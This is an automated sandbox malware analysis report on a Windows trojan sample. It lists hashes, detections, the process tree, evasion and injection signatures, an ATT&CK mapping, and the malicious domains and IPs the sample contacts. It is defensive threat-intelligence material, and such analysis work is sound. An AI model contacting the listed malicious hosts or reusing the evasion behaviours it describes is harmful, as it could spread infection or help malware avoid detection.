Play interactive tour

Edit tour

Windows Analysis Report TMB1fxNaqR

Overview

General Information

Sample Name:	TMB1fxNaqR (renamed file extension from none to exe)
Analysis ID:	458974
MD5:	a92922a71a9bf58cc2d95a6039c9a1b6
SHA1:	f419ba1e6da5dfc295857598e44b0a4eb0b3ecfc
SHA256:	213ea943865069cf1210a58860c619a8fa8928258abe8919fee8180feafea547
Tags:	32exetrojan
Infos:
Most interesting Screenshot:

Detection

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Creates processes via WMI

Contains functionality to dynamically determine API calls

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

TMB1fxNaqR.exe (PID: 1740 cmdline: 'C:\Users\user\Desktop\TMB1fxNaqR.exe' MD5: A92922A71A9BF58CC2D95A6039C9A1B6)

conhost.exe (PID: 2332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

TMB1fxNaqR.exe (PID: 4704 cmdline: 'C:\Users\user\Desktop\TMB1fxNaqR.exe' -a MD5: A92922A71A9BF58CC2D95A6039C9A1B6)

conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for domain / URL

Show sources

Source: google.vrthcobj.com

Virustotal: Detection: 7%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\sqlite.dll

Virustotal: Detection: 13%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: TMB1fxNaqR.exe	Virustotal: Detection: 44%			Perma Link
Source: TMB1fxNaqR.exe	ReversingLabs: Detection: 59%

Source: TMB1fxNaqR.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown

HTTPS traffic detected: 172.67.146.70:443 -> 192.168.2.3:49708 version: TLS 1.2

Source:

Binary string: D:\Administrator\Desktop\Qt5\Release\Qt5WebSockets.pdb source: sqlite.dll.2.dr

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 1948 DNS zone transfer UDP 192.168.2.3:58824 -> 34.97.69.225:53

Source: Joe Sandbox View

IP Address: 172.67.146.70 172.67.146.70

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Source: unknown

DNS traffic detected: queries for: a.goatgame.co

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708

Source: unknown

HTTPS traffic detected: 172.67.146.70:443 -> 192.168.2.3:49708 version: TLS 1.2

Source: TMB1fxNaqR.exe, 00000000.00000002.199960320.000000000075A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\Desktop\TMB1fxNaqR.exe

Code function: 0_2_004048FD

0_2_004048FD

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\sqlite.dll 7250A8A1B98D09BE823CD6EFD30D85E5418DFC3541D220BB0694DFCC547478BD

Source: TMB1fxNaqR.exe, 00000000.00000002.200008451.00000000020F0000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs TMB1fxNaqR.exe
Source: TMB1fxNaqR.exe, 00000000.00000000.197015002.000000000040E000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameLicenseHelper.exe> vs TMB1fxNaqR.exe
Source: TMB1fxNaqR.exe, 00000000.00000002.199945139.0000000000730000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs TMB1fxNaqR.exe
Source: TMB1fxNaqR.exe, 00000000.00000002.199945139.0000000000730000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs TMB1fxNaqR.exe
Source: TMB1fxNaqR.exe, 00000002.00000002.215054840.00000000021B0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs TMB1fxNaqR.exe
Source: TMB1fxNaqR.exe, 00000002.00000002.214734311.000000000040E000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameLicenseHelper.exe> vs TMB1fxNaqR.exe
Source: TMB1fxNaqR.exe, 00000002.00000002.215069964.0000000002200000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamewinhttp.dll.muij% vs TMB1fxNaqR.exe
Source: TMB1fxNaqR.exe, 00000002.00000002.215033311.0000000002110000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs TMB1fxNaqR.exe
Source: TMB1fxNaqR.exe, 00000002.00000002.215017751.0000000002100000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs TMB1fxNaqR.exe
Source: TMB1fxNaqR.exe, 00000002.00000002.215012630.00000000020F0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dllj% vs TMB1fxNaqR.exe
Source: TMB1fxNaqR.exe	Binary or memory string: OriginalFilenameLicenseHelper.exe> vs TMB1fxNaqR.exe

Source: TMB1fxNaqR.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal76.winEXE@5/2@3/1

Source: C:\Users\user\Desktop\TMB1fxNaqR.exe

Code function: 0_2_00401050 lstrcatW,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,SysAllocString,SysAllocString,SysAllocString,SysAllocString,lstrlenW,lstrlenW,VariantClear,VariantClear,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,VariantClear,VariantClear,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,

0_2_00401050

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5376:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2332:120:WilError_01

Source: C:\Users\user\Desktop\TMB1fxNaqR.exe

File created: C:\Users\user\AppData\Local\Temp\sqlite.dat

Jump to behavior

Source: TMB1fxNaqR.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\TMB1fxNaqR.exe

WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

Source: C:\Users\user\Desktop\TMB1fxNaqR.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\TMB1fxNaqR.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\TMB1fxNaqR.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\TMB1fxNaqR.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: TMB1fxNaqR.exe	Virustotal: Detection: 44%
Source: TMB1fxNaqR.exe	ReversingLabs: Detection: 59%

Source: C:\Users\user\Desktop\TMB1fxNaqR.exe

File read: C:\Users\user\Desktop\TMB1fxNaqR.exe:Zone.Identifier

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\TMB1fxNaqR.exe 'C:\Users\user\Desktop\TMB1fxNaqR.exe'
Source: C:\Users\user\Desktop\TMB1fxNaqR.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TMB1fxNaqR.exe	Process created: C:\Users\user\Desktop\TMB1fxNaqR.exe 'C:\Users\user\Desktop\TMB1fxNaqR.exe' -a
Source: C:\Users\user\Desktop\TMB1fxNaqR.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TMB1fxNaqR.exe	Process created: C:\Users\user\Desktop\TMB1fxNaqR.exe 'C:\Users\user\Desktop\TMB1fxNaqR.exe' -a	Jump to behavior

Source: C:\Users\user\Desktop\TMB1fxNaqR.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source:

Binary string: D:\Administrator\Desktop\Qt5\Release\Qt5WebSockets.pdb source: sqlite.dll.2.dr

Source: C:\Users\user\Desktop\TMB1fxNaqR.exe

Code function: 0_2_004018A0 LoadLibraryA,GetProcAddress,ShellExecuteExW,

0_2_004018A0

Source: C:\Users\user\Desktop\TMB1fxNaqR.exe

Code function: 0_2_004065A0 push eax; ret

0_2_004065CE

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Users\user\Desktop\TMB1fxNaqR.exe

WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

Source: C:\Users\user\Desktop\TMB1fxNaqR.exe

File created: C:\Users\user\AppData\Local\Temp\sqlite.dll

Jump to dropped file

Source: C:\Users\user\Desktop\TMB1fxNaqR.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\TMB1fxNaqR.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Source: C:\Users\user\Desktop\TMB1fxNaqR.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite.dll

Jump to dropped file

Source: C:\Users\user\Desktop\TMB1fxNaqR.exe TID: 3148	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\TMB1fxNaqR.exe TID: 5076	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\TMB1fxNaqR.exe

Code function: 0_2_004018A0 LoadLibraryA,GetProcAddress,ShellExecuteExW,

0_2_004018A0

Source: C:\Users\user\Desktop\TMB1fxNaqR.exe	Code function: 0_2_004053C0 SetUnhandledExceptionFilter,		0_2_004053C0
Source: C:\Users\user\Desktop\TMB1fxNaqR.exe	Code function: 0_2_004053D2 SetUnhandledExceptionFilter,		0_2_004053D2

Source: C:\Users\user\Desktop\TMB1fxNaqR.exe

Process created: C:\Users\user\Desktop\TMB1fxNaqR.exe 'C:\Users\user\Desktop\TMB1fxNaqR.exe' -a

Jump to behavior

Source: C:\Users\user\Desktop\TMB1fxNaqR.exe

Code function: 0_2_0040268E EntryPoint,GetVersion,GetCommandLineA,

0_2_0040268E

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation11	Path Interception	Process Injection11	Virtualization/Sandbox Evasion1	Input Capture1	Security Software Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection11	LSASS Memory	Query Registry1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Virtualization/Sandbox Evasion1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery3	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
TMB1fxNaqR.exe	45%	Virustotal		Browse
TMB1fxNaqR.exe	59%	ReversingLabs	Win32.Trojan.Wacatac

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\sqlite.dll	14%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\sqlite.dll	15%	ReversingLabs	Win32.Trojan.Generic

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
google.vrthcobj.com	8%	Virustotal		Browse
a.goatgame.co	2%	Virustotal		Browse

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
google.vrthcobj.com	34.97.69.225	true	true	8%, Virustotal, Browse	unknown
a.goatgame.co	172.67.146.70	true	false	2%, Virustotal, Browse	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.146.70	a.goatgame.co	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	458974
Start date:	03.08.2021
Start time:	23:37:18
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	TMB1fxNaqR (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.winEXE@5/2@3/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 100% (good quality ratio 93.6%) Quality average: 79.3% Quality standard deviation: 28.9%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): audiodg.exe, dllhost.exe, BackgroundTransferHost.exe, rundll32.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 20.82.209.183, 20.189.173.20, 23.211.6.115, 104.43.193.48, 52.255.188.83 Excluded domains from analysis (whitelisted): www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, dual-a-0001.a-msedge.net, onedsblobprdwus15.westus.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
23:38:09	API Interceptor	4x Sleep call for process: TMB1fxNaqR.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
172.67.146.70	LRios3pM39.exe	Get hash	malicious	Browse
	85d8c.exe	Get hash	malicious	Browse
	QfVER41Fwx.exe	Get hash	malicious	Browse
	O3h9kRdG7d.exe	Get hash	malicious	Browse
	1A263B2603212FF1E492D9E0C718F12601789E27EAABA.exe	Get hash	malicious	Browse
	U7HCBc2SVy.exe	Get hash	malicious	Browse
	76xAf6BYg8.exe	Get hash	malicious	Browse
	E4lwAiXNCE.exe	Get hash	malicious	Browse
	pLF8TJmHlD.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
google.vrthcobj.com	LRios3pM39.exe	Get hash	malicious	Browse	34.97.69.225
	85d8c.exe	Get hash	malicious	Browse	34.97.69.225
	QfVER41Fwx.exe	Get hash	malicious	Browse	34.97.69.225
	93ejLcdBh5.exe	Get hash	malicious	Browse	34.97.69.225
	k2VFD3gNGE.exe	Get hash	malicious	Browse	34.97.69.225
	MIN56KgzBN.exe	Get hash	malicious	Browse	34.97.69.225
	U7HCBc2SVy.exe	Get hash	malicious	Browse	34.97.69.225
	TIoFSlDlv6.exe	Get hash	malicious	Browse	34.97.69.225
	76xAf6BYg8.exe	Get hash	malicious	Browse	34.97.69.225
	E4lwAiXNCE.exe	Get hash	malicious	Browse	34.97.69.225
	pLF8TJmHlD.exe	Get hash	malicious	Browse	34.97.69.225
	sonia_6.exe	Get hash	malicious	Browse	34.97.69.225
	5H4iRfY1ek.exe	Get hash	malicious	Browse	34.97.69.225
	Copy.exe	Get hash	malicious	Browse	34.97.69.225
	pMVkvSyeIy.exe	Get hash	malicious	Browse	34.97.69.225
	w7pR0EOMwd.exe	Get hash	malicious	Browse	34.97.69.225
	BoLQVCmIZB.exe	Get hash	malicious	Browse	34.97.69.225
	DhWFvSKvSb.exe	Get hash	malicious	Browse	34.97.69.225
	U2HHCJvDj4.exe	Get hash	malicious	Browse	34.97.69.225
	CLnraL1yNc.exe	Get hash	malicious	Browse	34.97.69.225
a.goatgame.co	LRios3pM39.exe	Get hash	malicious	Browse	172.67.146.70
	85d8c.exe	Get hash	malicious	Browse	104.21.79.144
	85d8c.exe	Get hash	malicious	Browse	172.67.146.70
	QfVER41Fwx.exe	Get hash	malicious	Browse	172.67.146.70
	O3h9kRdG7d.exe	Get hash	malicious	Browse	172.67.146.70
	puzlXYxqKK.exe	Get hash	malicious	Browse	104.21.79.144
	k2VFD3gNGE.exe	Get hash	malicious	Browse	104.21.79.144
	MIN56KgzBN.exe	Get hash	malicious	Browse	104.21.79.144
	U7HCBc2SVy.exe	Get hash	malicious	Browse	172.67.146.70
	TIoFSlDlv6.exe	Get hash	malicious	Browse	104.21.79.144
	76xAf6BYg8.exe	Get hash	malicious	Browse	172.67.146.70
	E4lwAiXNCE.exe	Get hash	malicious	Browse	172.67.146.70
	pLF8TJmHlD.exe	Get hash	malicious	Browse	172.67.146.70
	sonia_6.exe	Get hash	malicious	Browse	104.21.79.144

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	LRios3pM39.exe	Get hash	malicious	Browse	172.67.146.70
	State Settlement Copy.html	Get hash	malicious	Browse	172.67.75.3
	Request Quotation.exe	Get hash	malicious	Browse	172.67.188.154
	invoice.vbs	Get hash	malicious	Browse	162.159.130.233
	kKZZ0J8y0c.exe	Get hash	malicious	Browse	104.21.19.200
	RFQ 29.exe	Get hash	malicious	Browse	104.21.19.200
	ATT80307.HTM	Get hash	malicious	Browse	104.16.19.94
	2C.TA9.HTML	Get hash	malicious	Browse	104.18.11.207
	Dosusign_Na_Sign.htm	Get hash	malicious	Browse	172.67.145.176
	RoyalMail_Requestform0729.exe	Get hash	malicious	Browse	172.67.188.154
	sbcss_Richard.DeNava_#inv0549387TWQYqzTPaYeqvaYMnpdIfJAwwzbguzauViQVRRplvOktNmAire.HTM	Get hash	malicious	Browse	104.16.18.94
	Fake.HTM	Get hash	malicious	Browse	104.16.19.94
	RoyalMail_Requestform1.exe	Get hash	malicious	Browse	172.67.188.154
	Nouveau bon de commande. 3007021_pdf.exe	Get hash	malicious	Browse	23.227.38.74
	MFS0175, MFS0117 MFS0194.exe	Get hash	malicious	Browse	172.67.188.154
	ORIGINAL PROFORMA INVOICE COAU7220898130,PDF.exe	Get hash	malicious	Browse	172.67.176.89
	Purchase Requirements.exe	Get hash	malicious	Browse	23.227.38.74
	items.doc	Get hash	malicious	Browse	104.21.19.200
	ZI09484474344.exe	Get hash	malicious	Browse	104.21.49.41
	#Ud83d#Udda8rocket.com 7335931#Ufffd90-queue-1675.htm	Get hash	malicious	Browse	104.16.19.94

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ce5f3254611a8c095a3d821d44539877	LRios3pM39.exe	Get hash	malicious	Browse	172.67.146.70
	24um7vU1BD.exe	Get hash	malicious	Browse	172.67.146.70
	JQ2bNBDOcO.exe	Get hash	malicious	Browse	172.67.146.70
	Dpwipnj1gx.exe	Get hash	malicious	Browse	172.67.146.70
	19G1ZLyqr2.exe	Get hash	malicious	Browse	172.67.146.70
	ULylDR5F36.exe	Get hash	malicious	Browse	172.67.146.70
	SecuriteInfo.com.W32.AIDetect.malware2.26285.exe	Get hash	malicious	Browse	172.67.146.70
	banload.msi	Get hash	malicious	Browse	172.67.146.70
	yQShMhZ7Hi.exe	Get hash	malicious	Browse	172.67.146.70
	zW4oE2ASRB.exe	Get hash	malicious	Browse	172.67.146.70
	run.exe	Get hash	malicious	Browse	172.67.146.70
	RNrtE1qOSL.exe	Get hash	malicious	Browse	172.67.146.70
	hDJzf1oo7U.exe	Get hash	malicious	Browse	172.67.146.70
	hpDcwMoScr.exe	Get hash	malicious	Browse	172.67.146.70
	JGJtVyC9dr.exe	Get hash	malicious	Browse	172.67.146.70
	QqcQ1EteWS.exe	Get hash	malicious	Browse	172.67.146.70
	Ya50avl5OT.exe	Get hash	malicious	Browse	172.67.146.70
	8xCetBLoAt.exe	Get hash	malicious	Browse	172.67.146.70
	7xt9iOfzN2.exe	Get hash	malicious	Browse	172.67.146.70
	5mTnLT28B7.exe	Get hash	malicious	Browse	172.67.146.70

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\sqlite.dll	LRios3pM39.exe	Get hash	malicious	Browse
	CyLELjM5zk.exe	Get hash	malicious	Browse
	setup_x86_x64_install.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\sqlite.dat Download File
Process:	C:\Users\user\Desktop\TMB1fxNaqR.exe
File Type:	data
Category:	dropped
Size (bytes):	578669
Entropy (8bit):	7.965453587440716
Encrypted:	false
SSDEEP:	12288:C11ticqWIMMXa2ad3KNjZi+VUYgokNxcg8aVg1gKtY7SQgCO:ePeBaRKNjoklalbVygKtY7xgd
MD5:	C78BF51EE294161707A6766E71CEE582
SHA1:	3BB4FF0B06FC5B3753AB39F21E959895834BF7F8
SHA-256:	BE449F187EC6EE4C4FA40642E698FFA3BFA19EC08848F4E0273B70427A1F1FC2
SHA-512:	B2D7D6D8C12B0DBDD677BC8ACD764AB0687E976268E46F461B98C5CF941197785B5D5718D2E3A734EAE49B0D358064EE23D9AAE217AF5F98DA5252A8A11D531D
Malicious:	false
Reputation:	low
Preview:	.<..Hh.j...?...O}3..8v,)cml.T/.....V.r.....n.?y..oz#V......N.{.....!....Y."..)v.T.........Ub.V...)..8..,.%.{4.yWrA.a36&..,...V...l9.y....39.y...wW.j.ox.....I..;..%..p.b..>..j.....j..awT..r...j....o./.7...,=uk..i../h..jj.P.j..?.-X.k..R}.j.5.b-F.k..c........j...j..Q?...).qe......,o'k.....j.J..))O.......k..\.....u,..k...,..k....k...tOT.X.jXe-.k..7.k...83U.......%..o.....Y%.....7.F.(j...KP..I..j..y...o..no......z......u/..DJP.e+.Dj..Z....k.......j$T.X.j[..`....o....k{..2\|6...H.....c%..........z......~^..j.-s.....o.-........6.L.`.j.-s.....i\|..y.Q'....k...}FT.X.jY..Y....o......y..=\|6..%..z/........s....>.j.-s.k../.:..........>\|/...h...2/..R..-......k....9.y.....j.6Z.j.o....l&..%.UD..`....&..t>".6g..j,..../W=..5...n.......X..h>.k..'...\|/h..jfDX.S...`&...Y....)U]bc[......'(..l..+....b.i....[...If!S...r......i.....Q^.......aeddT.`.'....*.[.h....e...?>....n....5......-..j..T..ow......k....-...k16.+i(~..L....j,...c.L./w=j...~./

C:\Users\user\AppData\Local\Temp\sqlite.dll Download File
Process:	C:\Users\user\Desktop\TMB1fxNaqR.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	81408
Entropy (8bit):	6.295064838876099
Encrypted:	false
SSDEEP:	1536:jkOh0YR+kfbE+2AJk64OceTbkS9Co5sWzcdSzEdY+wJpxpbcNop//:jkcjHY+fJhPN9H2SIdY+wJpxpQ8//
MD5:	05250AA12AD3C6A86DAB6DAB708D17FF
SHA1:	E41AD72C9A43070BB11FD7411800F71DDDF6BDD8
SHA-256:	7250A8A1B98D09BE823CD6EFD30D85E5418DFC3541D220BB0694DFCC547478BD
SHA-512:	A56DF11AF5243150753154E1CBA74E3CDD0CDECF09269B88A3944AC12B73DE59909CE6DBBBD3B1B6DA691D144FAC2599645B2017F66BAC64A106437168EC38C8
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 14%, Browse Antivirus: ReversingLabs, Detection: 15%
Joe Sandbox View:	Filename: LRios3pM39.exe, Detection: malicious, Browse Filename: CyLELjM5zk.exe, Detection: malicious, Browse Filename: setup_x86_x64_install.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V..f.x.5.x.5.x.5..r5.x.5..p5dx.5..q5.x.5@..4.x.5@..4.x.5@..4.x.5...5.x.5.x.5Jx.5...4.x.5...4.x.5..\|5.x.5...4.x.5Rich.x.5........................PE..L...f@.a...........!................8........................................p............@..........................&..L...<'..(....P.......................`...... ...p...................0...........@............................................text...M........................... ..`.rdata...].......^..................@..@.data........0....... ..............@....rsrc........P.......(..............@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	4.581071120397606
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	TMB1fxNaqR.exe
File size:	57344
MD5:	a92922a71a9bf58cc2d95a6039c9a1b6
SHA1:	f419ba1e6da5dfc295857598e44b0a4eb0b3ecfc
SHA256:	213ea943865069cf1210a58860c619a8fa8928258abe8919fee8180feafea547
SHA512:	0bb8f350ab4ba4570806b70e6bf82d986782d4635f5058eaf8c36550b1ba9e3bd6b6e5df098fbb9167dece0684bbae047824822bb55f54ee8a17993f29fd8007
SSDEEP:	768:URFJRVA3O2pxNojkTnJQ6XWzQjkpC/xbjNxxuCqXKClZt9:MMoITVXGpC5bpHPmlZt9
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../Q..N?..N?..N?.CF`..N?..l4..N?.NR1..N?..h4..N?..h5..N?.NFb..N?..N>..N?..m...N?.Rich.N?.........PE..L...RF.a.................p.

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x40268e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x61074652 [Mon Aug 2 01:11:46 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2cdeda7a0aa27475a825e9c41d4d95f0

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 00408150h
push 00403E48h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 10h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
call dword ptr [00408050h]
xor edx, edx
mov dl, ah
mov dword ptr [0040CF70h], edx
mov ecx, eax
and ecx, 000000FFh
mov dword ptr [0040CF6Ch], ecx
